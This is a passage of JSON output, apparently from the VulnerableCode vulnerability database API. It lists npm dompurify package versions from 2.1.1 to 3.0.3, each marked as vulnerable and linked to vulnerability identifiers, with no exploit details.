"http://public2.vulnerablecode.io/api/packages/708289?format=api", "purl": "pkg:npm/dompurify@2.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/708290?format=api", "purl": "pkg:npm/dompurify@2.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/708291?format=api", "purl": "pkg:npm/dompurify@2.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/708292?format=api", "purl": "pkg:npm/dompurify@2.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/708293?format=api", "purl": "pkg:npm/dompurify@2.2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/708294?format=api", "purl": "pkg:npm/dompurify@2.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/708295?format=api", "purl": "pkg:npm/dompurify@2.2.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/708296?format=api", "purl": "pkg:npm/dompurify@2.2.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/708297?format=api", "purl": "pkg:npm/dompurify@2.2.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/708298?format=api", "purl": "pkg:npm/dompurify@2.2.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/708299?format=api", "purl": "pkg:npm/dompurify@2.2.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.2.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/708300?format=api", "purl": "pkg:npm/dompurify@2.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/708301?format=api", "purl": "pkg:npm/dompurify@2.3.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/708302?format=api", "purl": "pkg:npm/dompurify@2.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/708303?format=api", "purl": "pkg:npm/dompurify@2.3.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/708304?format=api", "purl": "pkg:npm/dompurify@2.3.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/708305?format=api", "purl": "pkg:npm/dompurify@2.3.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/708306?format=api", "purl": "pkg:npm/dompurify@2.3.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/708307?format=api", "purl": "pkg:npm/dompurify@2.3.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/708308?format=api", "purl": "pkg:npm/dompurify@2.3.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/708309?format=api", "purl": "pkg:npm/dompurify@2.3.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/708310?format=api", "purl": "pkg:npm/dompurify@2.3.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/708311?format=api", "purl": "pkg:npm/dompurify@2.3.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/708312?format=api", "purl": "pkg:npm/dompurify@2.3.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.3.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/708313?format=api", "purl": "pkg:npm/dompurify@2.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/708314?format=api", "purl": "pkg:npm/dompurify@2.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/42241?format=api", "purl": "pkg:npm/dompurify@2.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/708315?format=api", "purl": "pkg:npm/dompurify@2.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/708316?format=api", "purl": "pkg:npm/dompurify@2.4.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/708317?format=api", "purl": "pkg:npm/dompurify@2.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/708318?format=api", "purl": "pkg:npm/dompurify@2.4.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/708319?format=api", "purl": "pkg:npm/dompurify@2.4.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/708320?format=api", "purl": "pkg:npm/dompurify@2.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/708321?format=api", "purl": "pkg:npm/dompurify@2.4.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/42057?format=api", "purl": "pkg:npm/dompurify@2.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/708322?format=api", "purl": "pkg:npm/dompurify@2.5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/708323?format=api", "purl": "pkg:npm/dompurify@2.5.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/147434?format=api", "purl": "pkg:npm/dompurify@2.5.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/49608?format=api", "purl": "pkg:npm/dompurify@2.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/748266?format=api", "purl": "pkg:npm/dompurify@2.5.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/748267?format=api", "purl": "pkg:npm/dompurify@2.5.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/748268?format=api", "purl": "pkg:npm/dompurify@2.5.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/147435?format=api", "purl": "pkg:npm/dompurify@2.5.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/68033?format=api", "purl": "pkg:npm/dompurify@2.5.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-ter4-v1bu-7fan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/146200?format=api", "purl": "pkg:npm/dompurify@3.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/708324?format=api", "purl": "pkg:npm/dompurify@3.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-68r6-dfzr-jyhh" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/708325?format=api", "purl": "pkg:npm/dompurify@3.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/708326?format=api", "purl": "pkg:npm/dompurify@3.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/708327?format=api", 